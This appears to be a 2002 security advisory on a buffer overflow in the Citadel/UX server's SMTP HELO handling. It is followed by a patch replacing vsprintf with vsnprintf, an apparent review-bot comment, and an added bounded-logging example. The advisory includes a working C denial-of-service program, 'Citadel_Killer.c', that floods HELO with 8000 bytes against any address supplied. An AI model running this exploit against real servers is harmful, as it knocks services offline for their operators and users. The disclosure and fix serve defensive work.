Citadel/UX Server Remote DoS attack Vulnerability

From: xperc (xpercat_private)
Date: Sat Mar 09 2002 - 15:10:15 PST


    What is Citadel/UX:
    
    Citadel/UX is an advanced client/server BBS program 
    for operating highly interactive sites, both on the 
    Internet and over dialup. Users can connect to 
    Citadel/UX using any of telnet, WWW, or client 
    software. Among the features supported are public 
    and private message bases (rooms), electronic mail, 
    real-time chat, paging, etc. The server is 
    multithreaded and can easily support a large number 
    of concurrent users. In addition, SMTP and POP3 
    servers are built-in for easy connection to Internet 
    mail. Citadel/UX is both robust and mature, having 
    been developed over the course of the past twelve 
    years.
    
    Problem:
    I have found a buffer overflow in the Citadel/UX server. 
    An attacker can execute a denial of service attack 
    against it. Once the big buffer has been sent, the 
    server is vulnerable.
    
    Example:
    [xperc@security citadel]$telnet 192.168.0.3 25
    Trying 192.168.0.3...
    Connected to 192.168.0.3.
    Escape character is '^]'.
    220 security ESMTP Citadel/UX server ready.
    helo [buffer]
    
    
    [buffer] is around 4096 characters. 
    
    
    /* Citadel_Killer.c
     *
     * Remote Denial of Service Citadel/UX Server.  
     * 
     *		by xpercat_private
     */
    #include <stdio.h>
    #include <stdlib.h>      /* exit() */
    #include <string.h>      /* memset(), strcat(), strlen() */
    #include <unistd.h>      /* close() */
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <arpa/inet.h>   /* inet_addr() */
    
    #define MAXBUF 		8000 
    #define MAXBUF2		MAXBUF+6
    #define RECVBUF		256
    #define CIT_SMTP	25	
    
    int main(int argc, char *argv[])
    {
    	int sockfd;
    	char msg[RECVBUF],buf[MAXBUF],sendbuf[MAXBUF2];
    	struct sockaddr_in target;
    
    	if(argc!=2){
    		fprintf(stderr,"Usage: %s target_address\n",*argv);
    		exit(-1);
    	}
    	if((sockfd=socket(AF_INET,SOCK_STREAM,0))<0){
    		perror("socket");
    		exit(-1);
    	}
    	target.sin_family=AF_INET;
    	target.sin_port=htons(CIT_SMTP);
    	target.sin_addr.s_addr=inet_addr(argv[1]);
    	if(connect(sockfd,(struct sockaddr*)&target,sizeof(target))<0){
    		perror("connect");
    		exit(-1);	
    	}
    	/* read the 220 banner before sending the HELO line */
    	if(recv(sockfd,msg,sizeof(msg)-1,0)<=0){
    		perror("recv");
    		exit(-1);
    	}
    
    	/* fill buf with 'a' and NUL-terminate it so "%s" stops at the end of buf */
    	memset(buf,'a',MAXBUF-1);
    	buf[MAXBUF-1]='\0';
    	snprintf(sendbuf,sizeof(sendbuf),"helo %s",buf);
    	strcat(sendbuf,"\n");
    
    	send(sockfd,sendbuf,strlen(sendbuf),0);
    	close(sockfd);
    
    	return 0;
    }
    
    Patch for this Vulnerability:
    --- citadel-old/sysdep.c	Sat Dec  8 12:31:44 
    2001
    +++ citadel/sysdep.c	Sat Mar  9 05:51:11 
    2002
    @@ -106,7 +106,7 @@
     	char buf[4096];
       
             va_start(arg_ptr, format);   
    -        vsprintf(buf, format, arg_ptr);   
    +        vsnprintf(buf, sizeof(buf), format, arg_ptr);   
             va_end(arg_ptr);   
     
     	if (loglevel <= verbosity) { 
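    Review bot: the switch to vsnprintf(buf, sizeof(buf), ...) bounds the write into buf[4096], but the return value is dropped, so an over-long result (the 4096-character HELO argument from the advisory) is now silently cut off rather than noticed. vsnprintf returns the length it would have written, so consider `int n = vsnprintf(buf, sizeof(buf), format, arg_ptr);` followed by `if (n >= (int)sizeof(buf)) { /* record that the log line was truncated */ }` ahead of the `if (loglevel <= verbosity)` check. It is also worth grepping the rest of the tree for other vsprintf/sprintf calls into fixed-size buffers, since this one-hunk patch only covers the logging routine.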
    

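The bounded-formatting fix from the patch, written out as an added example that is not Citadel/UX code: format_log() and log_helo() are hypothetical names, LOGBUF mirrors the buf[4096] in the patched routine, and the over-long HELO argument is constructed inline in the advisory's shape (a run of 'a' bytes). Unlike the hunk, it also reports truncation to the caller.

```c
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define LOGBUF 4096  /* same size as buf[4096] in the patched sysdep.c */

/* Bounded replacement for the vsprintf() call: never writes past
 * out[outlen-1] and reports whether the message was cut short.
 * Returns 1 if the whole message fit, 0 if it was truncated or on error. */
int format_log(char *out, size_t outlen, const char *format, ...)
{
    va_list ap;
    int n;
    va_start(ap, format);
    n = vsnprintf(out, outlen, format, ap);  /* n = length it wanted to write */
    va_end(ap);
    if (n < 0) {            /* encoding error: leave a valid empty string */
        out[0] = '\0';
        return 0;
    }
    return (size_t)n < outlen;  /* n >= outlen means vsnprintf truncated */
}

/* Logs a HELO argument the way the patched routine would; the caller learns
 * about truncation instead of the stack being overwritten. */
int log_helo(const char *hostname)
{
    char buf[LOGBUF];
    int fit = format_log(buf, sizeof buf, "SMTP HELO from %s", hostname);
    /* a server would hand buf to its log sink here; omitted in this example */
    return fit;
}

/* Builds a constructed HELO argument of arg_len 'a' bytes (the shape of the
 * advisory's trigger) and returns what log_helo() reports for it. */
int helo_fits(size_t arg_len)
{
    char *arg = malloc(arg_len + 1);
    int fit;
    if (arg == NULL) return -1;
    memset(arg, 'a', arg_len);
    arg[arg_len] = '\0';
    fit = log_helo(arg);     /* "SMTP HELO from " is 15 bytes, so 4080 'a's
                                fill the 4096-byte buffer exactly; 4081 do not */
    free(arg);
    return fit;
}
```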